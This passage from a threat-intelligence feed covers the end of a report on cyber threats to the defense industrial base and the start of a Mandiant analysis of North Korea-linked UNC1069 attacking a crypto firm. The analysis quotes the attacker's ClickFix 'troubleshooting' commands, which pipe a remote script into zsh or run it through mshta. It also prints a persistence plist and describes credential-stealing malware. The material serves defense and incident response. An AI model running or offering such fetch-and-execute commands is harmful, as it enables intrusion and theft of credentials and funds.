baseline;">UNC3886 is one of the most capable and prolific China-nexus threat groups GTIG has observed in recent years. While UNC3886 has targeted multiple sectors, their early operations in 2022 had a distinct focus on aerospace and defense entities. We have observed UNC3886 employ 17 distinct malware families in operations against DIB targets. Beyond aerospace and defense targets, UNC3886 campaigns have been observed impacting the telecommunications and technology sectors in the US and Asia.   </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">UNC5221 is a sophisticated, suspected China-nexus cyber espionage actor characterized by its focus on exploiting edge infrastructure to penetrate high-value strategic targets. The actor demonstrates a distinct operational preference for compromising perimeter devices—such as VPN appliances and firewalls—to bypass traditional endpoint detection, subsequently establishing persistent access to conduct long-term intelligence collection. Their observed targeting profile is highly selective, prioritizing entities that serve as "force multipliers" for intelligence gathering, such as managed service providers (MSPs), law firms, and central nodes in the global technology supply chain. The </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"><span style="text-decoration: underline; vertical-align: baseline;">BRICKSTORM malware</span></a><span style="vertical-align: baseline;"> campaign</span><span style="vertical-align: baseline;"> uncovered in 2025, which we suspect was conducted by UNC5221, was notable for its stealth, with an average dwell time of 393 days. Organizations that were impacted spanned multiple sectors but included aerospace and defense. </span></p> </li> </ul> <p><span style="vertical-align: baseline;">In addition to these two groups, GTIG has analysed other China-nexus groups impacting the defense sector in recent years. </span></p> <h4><span style="vertical-align: baseline;">UNC3236 Observed Targeting U.S. Military and Logistics Portal</span></h4> <p><span style="vertical-align: baseline;">In 2024, GTIG observed reconnaissance activity associated with UNC3236 (linked to Volt Typhoon) against publicly hosted login portals of North American military and defense contractors, and U.S. and Canadian government domains related to North American infrastructure. The activity leveraged the ARCMAZE obfuscation network to obfuscate its origin. Netflow analysis revealed communication with SOHO routers outside the ARCMAZE network, suggesting an additional hop point to hinder tracking. Targeted entities included a Drupal web login portal used by defense contractors involved in U.S. military infrastructure projects. </span></p> <h4><span style="vertical-align: baseline;">UNC6508 Search Terms Indicate Interest in Defense Contractors and Military Platforms</span></h4> <p><span style="vertical-align: baseline;">In late 2023, China-nexus threat cluster UNC6508 targeted a US-based research institution through a multi-stage attack that leveraged an initial REDCap exploit and custom malware named INFINITERED.</span><span style="vertical-align: baseline;"> This malware is embedded within a trojanized version of a legitimate REDCap system file and functions as a recursive dropper. It is capable of enabling persistent remote access and credential theft after intercepting the application's software upgrade process to inject malicious code into the next version's core files. </span></p> <p><span style="vertical-align: baseline;">The actor used the REDCap system access to </span><span style="vertical-align: baseline;">collect credentials to access the victim’s email platform filtering rules</span><span style="vertical-align: baseline;"> to collect information related to US national security and foreign policy (Figure 10). GTIG assesses with low confidence that the actors likely sought to fulfill a set of intelligence collection requirements, though the nature and intended focus of the collection effort are unknown.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dib-threats-fig9-white.max-1000x1000.png" alt="Categories of UNC6508 email forwarding triggers"> </a> <figcaption class="article-image__caption "><p data-block-key="81ess">Figure 9: Categories of UNC6508 email forwarding triggers</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">By August 2025, the actors leveraged credentials obtained via INFINITERED to access the institution's environment with legitimate, compromised administrator credentials. They abused the tenant compliance rules to dynamically reroute messages based on a combination of keywords and or recipients. The actors modified an email rule to BCC an actor-controlled email address if any of 150 regex-defined search terms or email addresses appeared in email bodies or subjects, thereby facilitating data exfiltration by forwarding any email that contained at least one of the terms related to US national security, military equipment and operations, foreign policy, and medical research, among others. About a third of the keywords referenced a military system or a defense contractor, with a notable amount related to UAS or counter-UAS systems.</span></p> <h3><span style="vertical-align: baseline;">4. Hack, Leak, and Disruption of the Manufacturing Supply Chain</span></h3> <p><span style="vertical-align: baseline;">Extortion operations continue to represent the most impactful cyber crime threat globally, due to the prevalence of the activity, the potential for disrupting business operations, and the public disclosure of sensitive data such as personally identifiable information (PII), intellectual property, and legal documents. Similarly, hack-and-leak operations conducted by geopolitically and ideologically motivated hacktivist groups may also result in the public disclosure of sensitive data. These data breaches can represent a risk to defense contractors via loss of intellectual property, to their employees due to the potential use of PII for targeting data, and to the defense agencies they support. Less frequently, both financially and ideologically motivated threat actors may conduct significant disruptive operations, such as the deployment of ransomware on operational technology (OT) systems or distributed-denial-of-service (DDoS) attacks.</span></p> <h4><span style="vertical-align: baseline;">Cyber Crime Activity Impacting the Defense Industrial Base and Broader Manufacturing and Industrial Supply Chain</span></h4> <p><span style="vertical-align: baseline;">While dedicated aerospace &amp; defense organizations represent only about 1% of victims listed on data leak sites (DLS) in 2025, manufacturing organizations, many of which directly or indirectly support defense contracts, have consistently represented the largest share of DLS listings by count (Figure 11). This broader manufacturing sector includes companies that may provide dual-use components for defense applications. For example, a significant 2025 ransomware incident affecting a UK automotive manufacturer, who also produces military vehicles, disrupted production for weeks and </span><a href="https://www.infosecurity-magazine.com/news/uk-execs-warn-may-not-suruvie/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">reportedly</span></a><span style="vertical-align: baseline;"> affected more than 5,000 additional organizations. This highlights the cyber risk to the broader industrial supply chain supporting the defense capacity of a nation, including the ability to surge defense components in a wartime environment can be impacted, even when these intrusions are limited to IT networks.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dib-threats-fig10.max-1000x1000.png" alt="Percent of DLS victims in the manufacturing industry by quarter"> </a> <figcaption class="article-image__caption "><p data-block-key="81ess">Figure 10: Percent of DLS victims in the manufacturing industry by quarter</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Threat actors also regularly share and/or advertise illicit access to or stolen data from aerospace and defense sector organizations. For example, the persona “miyako,” who has been active on multiple underground forums based on the use of the same username and Session ID, has advertised access to multiple, unnamed, defense contractors over time (Figure 11). While defense contractors are likely not attractive targets for many cyber criminals, given that these organizations typically maintain a strong security posture, a small subset of financially motivated actors may disproportionately target the industry due to dual motivations, such as a desire for notoriety or ideological motivations. For example, the BreachForums actor “USDoD” regularly shared or advertised access to data claimed to have been stolen from prominent defense-related organizations.</span><span style="vertical-align: baseline;"> In a bizarre 2023 interview, USDoD </span><a href="https://databreaches.net/2023/09/17/im-not-pro-russia-and-im-not-a-terrorist-infragard-and-airbus-hacker-usdod-unveils-his-new-campaigns/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">claimed</span></a><span style="vertical-align: baseline;"> the threat was misdirection and that they were actually targeting a consulting firm, NATO, CEPOL, Europol, and Interpol. USDoD further indicated that they had a personal vendetta and were not motivated by politics. In October 2024, Brazilian authorities arrested an individual accused of being USDoD.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dib-threats-fig11.max-1000x1000.png" alt="Advertisement for “US Navy / USAF / USDoD Engineering Contractor”"> </a> <figcaption class="article-image__caption "><p data-block-key="81ess">Figure 11: Advertisement for “US Navy / USAF / USDoD Engineering Contractor”</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Hacktivist Operations Targeting the Defense Industrial Base</span></h4> <p><span style="vertical-align: baseline;">Pro-Russia and pro-Iran hacktivism operations at times extend beyond simple nuisance-level attacks to high-impact operations, including data leaks and operational disruptions. Unlike financially motivated activity, these campaigns prioritize the exposure of sensitive military schematics and personal personnel data—often through "hack-and-leak" tactics—in an attempt to erode public trust, intimidate defense officials, and influence geopolitical developments on the ground. Robust geopolitically motivated hacktivist activity works not only to advance state interests but also can serve to complicate attribution of threat activity from state-backed actors, which are known to leverage hacktivist tactics for their own ends.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/dib-threats-fig12.max-1000x1000.png" alt="Notable 2025 hacktivist claims allegedly involving the defense industrial base"> </a> <figcaption class="article-image__caption "><p data-block-key="043c2">Figure 12: Notable 2025 hacktivist claims allegedly involving the defense industrial base</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">Pro-Russia Hacktivism Activity</span></h5> <p><span style="vertical-align: baseline;">Pro-Russia hacktivist actors have collectively dedicated a notable portion of their threat activity to targeting entities associated with Ukraine’s and Western countries’ militaries and in their defense sectors. As we have </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/global-revival-of-hacktivism"><span style="text-decoration: underline; vertical-align: baseline;">previously reported</span></a><span style="vertical-align: baseline;">, GTIG observed a revival and intensification of activity within the pro-Russia hacktivist ecosystem in response to the launch of Russia’s full-scale invasion of Ukraine in February 2022. The vast majority of pro-Russia hacktivist activity that we have subsequently tracked has likewise appeared intended to advance Russia’s interests in the war. As with the targeting of other high-profile organizations, at least some of this activity appeared primarily intended to generate media attention. However, a review of the related threat activity observed in 2025 also suggest that actors targeting military/defense sectors had more diverse objectives, including seeding influence narratives, monetizing claimed access, and influencing developments on the ground. Some observed attack/targeting trends over the last year include the following:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">DDoS Attacks:</strong><span style="vertical-align: baseline;"> Multiple pro-Russia hacktivist groups have claimed distributed denial-of-service (DDoS) attacks targeting government and private organizations involved in defense. This includes multiple such attacks claimed by the group NoName057(16), which has prolifically leveraged DDoS attacks to attack a range of targets</span><span style="vertical-align: baseline;">. While this often may be more nuisance-level activity, it demonstrates at the most basic level how defense sector targeting is a part of hacktivist threat activity that is broadly oriented toward targeting entities in countries that support Ukraine. </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Network Intrusion:</strong><span style="vertical-align: baseline;"> In limited instances, pro-Russia groups claimed intrusion activity targeting private defense-sector organizations. Often this was in support of hack and leak operations. For example, in November 2025, the group PalachPro claimed to have targeted multiple Italian defense companies, alleging that they exfiltrated sensitive data from their networks—in at least one instance, PalachPro claimed it would sell this data</span><span style="vertical-align: baseline;">; that same month, the group Infrastructure Destruction Squad claimed to have launched an unsuccessful attack targeting a major US arms producer</span><span style="vertical-align: baseline;">.  </span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Document Leaks:</strong><span style="vertical-align: baseline;"> A continuous stream of claimed or otherwise implied hack and leak operations has targeted the Ukrainian military and the government and private organizations that support Ukraine. Beregini and JokerDNR (aka JokerDPR) are two notable pro-Russia groups engaged in this activity, both of which regularly disseminate documents that they claim are related to the administration of Ukraine’s military, coordination with Ukraine’s foreign partners, and foreign weapons systems supplied to Ukraine. GTIG cannot confirm the potential validity of all the disseminated documents, though in at least some instances the sensitive nature of the documents appears to be overstated. </span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Often, Beregini and JokerDNR leverage this activity to promote anti-Ukraine narratives, including those that appear intended to reduce domestic confidence in the Ukrainian government by alleging things like corruption and government scandals, or that Ukraine is being supplied with inferior equipment</span><span style="vertical-align: baseline;">. </span></p> </li> </ul> </ul> <h5><span style="vertical-align: baseline;">Pro-Iran Hacktivism Activity</span></h5> <p><span style="vertical-align: baseline;">Pro-Iran hacktivist threat activity targeting the defense sector has intensified significantly following the onset of the Israel-Hamas conflict in October 2023. These operations are characterized by a shift from nuisance-level disruptive attacks to sophisticated "hack-and-leak" campaigns, supply chain compromises, and aggressive psychological warfare targeting military personnel. Threat actors such as Handala Hack, Cyber Toufan, and the Cyber Isnaad Front have prioritized the Israeli defense industrial base—compromising manufacturers, logistics providers, and technology firms to expose sensitive schematics, personnel data, and military contracts. The objective of these campaigns is not merely disruption but the degradation of Israel’s national security apparatus through the exposure of military capabilities, the intimidation of defense sector employees via "doxxing," and the erosion of public trust in the security establishment. </span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The pro-Iran persona Handala Hack, which GTIG has observed publicize threat activity associated with UNC5203, has consistently targeted both the Israeli Government, as well as its supporting military-industrial complex. Threat activity attributed to the persona has primarily consisted of hack-and-leak operations, but has increasingly incorporated doxxing and tactics designed to promote fear, uncertainty, and doubt (FUD). </span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">On the two-year anniversary of al-Aqsa Flood, the day which Hamas-led militants attacked Israel, Handala launched “Handala RedWanted,”</span><span style="vertical-align: baseline;"> an actor-controlled website supporting a concerted doxxing/intimidation campaign targeting members of Israel’s Armed Forces, its intelligence and national security apparatus, and both individuals and organizations the group claims to comprise Israel’s military-industrial complex. </span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Following the announcement of RedWanted, the persona has recently signaled an expansion of its operations vis-a-vis the launch of “Handala Alert.” Significant in terms of a potential expansion in the group’s external targeting calculus, which has long prioritized Israel, is a renewed effort by Handala to “support anti-regime activities abroad.” </span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Ongoing campaigns such as those attributed to the Pro-Iran personas Cyber Toufan (UNC5318) and الجبهة الإسناد السيبرانية (Cyber Isnaad Front) are additionally demonstrative of the broader ecosystem’s longstanding prioritization of the defense sector. </span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Leveraging a newly-established leak channel on Telegram (ILDefenseLeaks</span><span style="vertical-align: baseline;">), Cyber Toufan has publicized a number of operations targeting Israel’s military-industrial sector, most of which the group claims to have been the result of a supply chain compromise resulting from its breach of network infrastructure associated with an Israeli defense contractor. According to Cyber Toufan, access to this contractor </span><a href="https://www.jpost.com/defense-and-tech/article-873267" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">resulted in the compromise</span></a><span style="vertical-align: baseline;"> of at least 17 additional Israeli defense contractor organizations.</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">While these activities have prioritized the targeting of Israel specifically, claimed operations have in limited instances impacted other countries. For example, recent threat activity publicized by Cyber Isnaad Front</span><span style="vertical-align: baseline;"> also surrounding the alleged compromise of the aforementioned Israeli defense contractor leaked information involving reported plans by the Australian Defense Force to purchase Spike NLOS anti-tank missiles from Israel</span><span style="vertical-align: baseline;">. </span></p> </li> </ul> </ul> <h3><span style="vertical-align: baseline;">Conclusion </span></h3> <p><span style="vertical-align: baseline;">Given global efforts to increase defense investment and develop new technologies the security of the defense sector is more important to national security than ever. Actors supporting nation state objectives have interest in the production of new and emerging defense technologies, their capabilities, the end customers purchasing them, and potential methods for countering these systems. Financially motivated actors carry out extortion against this sector and the broader manufacturing base like many of the other verticals they target for monetary gain. </span></p> <p><span style="vertical-align: baseline;">While specific risks vary by geographic footprint and sub-sector specialization, the broader trend is clear: the defense industrial base is under a state of constant, multi-vector siege. The campaigns against defense contractors in Ukraine, threats to or exploitation of defense personnel, the persistent volume of intrusions by China-nexus actors, and the hack, leak, and disruption of the manufacturing base are some of the leading threats to this industry today. To maintain a competitive advantage, organizations must move beyond reactive postures. By integrating these intelligence trends into proactive threat hunting and resilient architecture, the defense sector can ensure that the systems protecting the nation are not compromised before they ever reach the field.</span></p></div>Tue, 10 Feb 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/threats-to-defense-industrial-base/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/threats-to-defense-industrial-base/Google Threat Intelligence Group https://cloud.google.com/blog/topics/threat-intelligence/unc1069-targets-cryptocurrency-ai-social-engineering/<div class="block-paragraph_advanced"><p>Written by: <span style="vertical-align: baseline;">Ross Inman, Adrian Hernandez</span></p> <hr/></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction</span></h3> <p><span style="vertical-align: baseline;">North Korean threat actors continue to evolve their tradecraft to target the cryptocurrency and decentralized finance (DeFi) verticals. Mandiant recently investigated an intrusion targeting a FinTech entity within this sector, attributed to </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"><span style="text-decoration: underline; vertical-align: baseline;">UNC1069</span></a><span style="vertical-align: baseline;">, a financially motivated threat actor active since at least 2018. This investigation revealed a tailored intrusion resulting in the deployment of seven unique malware families, including a new set of tooling designed to capture host and victim data: SILENCELIFT, DEEPBREATH and CHROMEPUSH. The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim.</span></p> <p><span style="vertical-align: baseline;">These tactics build upon a shift first documented in the November 2025 publication </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"><span style="text-decoration: underline; vertical-align: baseline;">GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools</span></a><span style="vertical-align: baseline;"> where Google Threat Intelligence Group (GTIG) identified UNC1069's transition from using AI for simple productivity gains to deploying novel AI-enabled lures in active operations. The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft. While UNC1069 typically targets cryptocurrency startups, software developers, and venture capital firms, the deployment of multiple new malware families alongside the known downloader SUGARLOADER marks a significant expansion in their capabilities.</span></p> <h3><span style="vertical-align: baseline;">Initial Vector and Social Engineering </span></h3> <p><span style="vertical-align: baseline;">The victim was contacted via Telegram through the account of an executive of a cryptocurrency company that had been compromised by UNC1069. Mandiant identified claims from the true owner of the account, posted from another social media profile, where they had posted a warning to their contacts that their Telegram account had been hijacked; however, Mandiant was not able to verify or establish contact with this executive. UNC1069 engaged the victim and, after building a rapport, sent a Calendly link to schedule a 30-minute meeting. The meeting link itself directed to a spoofed Zoom meeting that was hosted on the threat actor's infrastructure, </span><code style="vertical-align: baseline;">zoom[.]uswe05[.]us</code><span style="vertical-align: baseline;">. </span></p> <p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">The victim reported that during the call, they were presented with a video of a CEO from another cryptocurrency company that appeared to be a deepfake. While Mandiant was unable to recover forensic evidence to independently verify the use of AI models in this specific instance, the reported ruse is similar to a previously publicly reported </span><a href="https://x.com/0xryankim/status/1927630589718573065" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">incident</span></a><span style="vertical-align: baseline;"> with similar characteristics, where deepfakes were also allegedly used</span>.</span></span></p> <p><span style="vertical-align: baseline;">Once in the "meeting," the fake video call facilitated a ruse that gave the impression to the end user that they were experiencing audio issues. This was employed by the threat actor to conduct a ClickFix attack: an attack technique where the threat actor directs the user to run troubleshooting commands on their system to address a purported technical issue. The recovered web page provided two sets of commands to be run for "troubleshooting": one for macOS systems, and one for Windows systems. Embedded within the string of commands was a single command that initiated the infection chain. </span></p> <p><span style="vertical-align: baseline;">Mandiant has observed UNC1069 employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives. This includes the use of fake Zoom meetings and a known use of AI tools by the threat actor for editing images or videos during the social engineering stage. </span></p> <p><span style="vertical-align: baseline;">UNC1069 is known to use tools like </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"><span style="text-decoration: underline; vertical-align: baseline;">Gemini</span></a><span style="vertical-align: baseline;"> to develop tooling, conduct operational research, and assist during the reconnaissance stages, as reported by GTIG. Additionally, Kaspersky recently </span><a href="https://securelist.com/bluenoroff-apt-campaigns-ghostcall-and-ghosthire/117842/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">claimed</span></a><span style="vertical-align: baseline;"> Bluenoroff, a threat actor that overlaps with UNC1069, is also using GTP-4o models to modify images indicating adoption of GenAI tools and integration of AI into the adversary lifecycle.</span></p> <h3><span style="vertical-align: baseline;">Infection Chain </span></h3> <p><span style="vertical-align: baseline;">In the incident response engagement performed by Mandiant, the victim executed the "troubleshooting" commands provided in Figure 1, which led to the initial infection of the macOS device.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>system_profiler SPAudioData softwareupdate --evaluate-products --products audio --agree-to-license curl -A audio -s hxxp://mylingocoin[.]com/audio/fix/6454694440 | zsh system_profiler SPSoundCardData softwareupdate --evaluate-products --products soundcard system_profiler SPSpeechData softwareupdate --evaluate-products --products speech --agree-to-license</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 1: Attacker commands shared during the social engineering stage</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">A set of "troubleshooting" commands that targeted Windows operating systems was also recovered from the fake Zoom call webpage:</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>setx audio_volume 100 pnputil /enum-devices /connected /class "Audio" mshta hxxp://mylingocoin[.]com/audio/fix/6454694440 wmic sounddev get Caption, ProductName, DeviceID, Status msdt -id AudioPlaybackDiagnostic exit</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 2: Attacker commands shared when Windows is detected</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Evidence of AppleScript execution was recorded immediately following the start of the infection chain; however, contents of the AppleScript payload could not be recovered from the resident forensic artifacts on the system. Following the AppleScript execution a malicious Mach-O binary was deployed to the system. </span></p> <p><span style="vertical-align: baseline;">The first malicious executable file deployed to the system was a packed backdoor tracked by Mandiant as WAVESHAPER. WAVESHAPER served as a conduit to deploy a downloader tracked by Mandiant as HYPERCALL as well as subsequent additional tooling to considerably expand the adversary's foothold on the system. </span></p> <p><span style="vertical-align: baseline;">Mandiant observed three uses of the HYPERCALL downloader during the intrusion: </span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Execute a follow-on backdoor component, tracked by Mandiant as HIDDENCALL, which provided hands-on keyboard access to the compromised system</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Deploy another downloader, tracked by Mandiant as SUGARLOADER</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Facilitate the execution of a toehold backdoor, tracked by Mandiant as SILENCELIFT, which beacons system information to a command-and-control (C2 or C&amp;C) server</span></p> </li> </ol></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1069-crypto-ai-fig3a.max-1000x1000.png" alt="Attack chain"> </a> <figcaption class="article-image__caption "><p data-block-key="vbsuh">Figure 3: Attack chain</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">XProtect </span></h3> <p><a href="https://support.apple.com/en-gb/guide/security/sec469d47bd8/web" rel="noopener" target="_blank"><span style="vertical-align: baseline;">XProtect</span></a><span style="vertical-align: baseline;"> is the built-in anti-virus technology included in macOS. Originally relying on signature-based detection only, the XProtect Behavioral Service (XBS) was introduced to implement behavioral-based detection. If a program violates one of the behavioral-based rules, which are defined by Apple, information about the offending program is recorded in the XProtect Database (XPdb), an SQLite 3 database located at </span><code style="vertical-align: baseline;">/var/protected/xprotect/XPdb</code><span style="vertical-align: baseline;">.</span></p> <p><span style="vertical-align: baseline;">Unlike signature-based detections, behavioral-based detections do not result in XProtect blocking execution or quarantining of the offending program. </span></p> <p><span style="vertical-align: baseline;">Mandiant recovered the file paths and SHA256 hashes of programs that had violated one or more of the XBS rules from the XPdb. This included information on malicious programs that had been deleted and could not be recovered. As the XPdb also includes a timestamp of the detection, Mandiant could determine the sequence of events associated with malware execution, from the initial infection chain to the next-stage malware deployments, despite no endpoint detection and response (EDR) product being present on the compromised system. </span></p> <h3><span style="vertical-align: baseline;">Data Harvesting and Persistence</span></h3> <p><span style="vertical-align: baseline;">Mandiant identified two disparate data miners that were deployed by the threat actor during their access period: DEEPBREATH and CHROMEPUSH. </span></p> <p><span style="vertical-align: baseline;">DEEPBREATH, a data miner written in Swift, was deployed via HIDDENCALL—the follow-on backdoor component to HYPERCALL. DEEPBREATH manipulates the Transparency, Consent, and Control (TCC) database to gain broad file system access, enabling it to steal:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Credentials from the user's Keychain</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Browser data from Chrome, Brave, and Edge</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">User data from two different versions of Telegram</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">User data from Apple Notes</span></p> </li> </ol> <p><span style="vertical-align: baseline;">DEEPBREATH stages the targeted data in a temporary folder location and compresses the data into a ZIP archive, which was exfiltrated to a remote server via the curl command-line utility. </span></p> <p><span style="vertical-align: baseline;">Mandiant also identified HYPERCALL deployed an additional malware loader, tracked as part of the code family SUGARLOADER. A persistence mechanism was installed in the form of a launch daemon for SUGARLOADER, which configured the system to execute the malware during the macOS startup process. The launch daemon was configured through a property list (Plist) file, </span><code style="vertical-align: baseline;">/Library/LaunchDaemons/com.apple.system.updater.plist</code><span style="vertical-align: baseline;">. The contents of the launch daemon Plist file are provided in Figure 4.</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>&lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"&gt; &lt;plist version="1.0"&gt; &lt;dict&gt; &lt;key&gt;Label&lt;/key&gt; &lt;string&gt;com.apple.system.updater&lt;/string&gt; &lt;key&gt;ProgramArguments&lt;/key&gt; &lt;array&gt; &lt;string&gt;/Library/OSRecovery/SystemUpdater&lt;/string&gt; &lt;/array&gt; &lt;key&gt;RunAtLoad&lt;/key&gt; &lt;true/&gt; &lt;key&gt;KeepAlive&lt;/key&gt; &lt;false/&gt; &lt;key&gt;ExitTimeOut&lt;/key&gt; &lt;integer&gt;10&lt;/integer&gt; &lt;/dict&gt; &lt;/plist&gt;</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 4: Launch daemon Plist configured to execute SUGARLOADER</span></p></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The SUGARLOADER sample recovered during the investigation did not have any internal functionality for establishing persistence; therefore, Mandiant assesses the launch daemon was created manually via access granted by one of the other malicious programs.</span></p> <p><span style="vertical-align: baseline;">Mandiant observed SUGARLOADER was solely used to deploy CHROMEPUSH, a data miner written in C++. CHROMEPUSH deployed a browser extension to Google Chrome and Brave browsers that masqueraded as an extension purposed for editing Google Docs offline. CHROMEPUSH additionally possessed the capability to record keystrokes, observe username and password inputs, and extract browser cookies, completing the data harvesting on the host.</span></p> <h3><span style="vertical-align: baseline;">In the Spotlight: UNC1069</span></h3> <p><span style="vertical-align: baseline;">UNC1069 is a financially motivated threat actor that is suspected with high confidence to have a North Korea nexus and that has been tracked by Mandiant since 2018. Mandiant has observed this threat actor evolve its tactics, techniques, and procedures (TTPs), tooling, and targeting. Since at least 2023, the group has shifted from spear-phishing techniques and traditional finance (TradFi) targeting towards the Web3 industry, such as centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds. Notably, while UNC1069 has had a smaller impact on cryptocurrency heists compared to other groups like UNC4899 in 2025, it remains an active threat targeting centralized exchanges and both entities and individuals for financial gain.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1069-crypto-ai-fig5.max-1000x1000.png" alt="UNC1069 victimology map"> </a> <figcaption class="article-image__caption "><p data-block-key="ssdbb">Figure 5: UNC1069 victimology map</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Mandiant has observed this group active in 2025 targeting the financial services and the cryptocurrency industry in payments, brokerage, staking, and wallet infrastructure verticals. </span></p> <p><span style="vertical-align: baseline;">While UNC1069 operators have targeted both individuals in the Web3 space and corporate networks in these verticals, UNC1069 and other suspected Democratic People's Republic of Korea (DPRK)-nexus groups have demonstrated the capability to move from personal to corporate devices using different techniques in the past. However, for this particular incident, Mandiant noted an unusually large amount of tooling dropped onto a single host targeting a single individual. This evidence confirms this incident was a targeted attack to harvest as much data as possible for a dual purpose; enabling cryptocurrency theft and fueling future social engineering 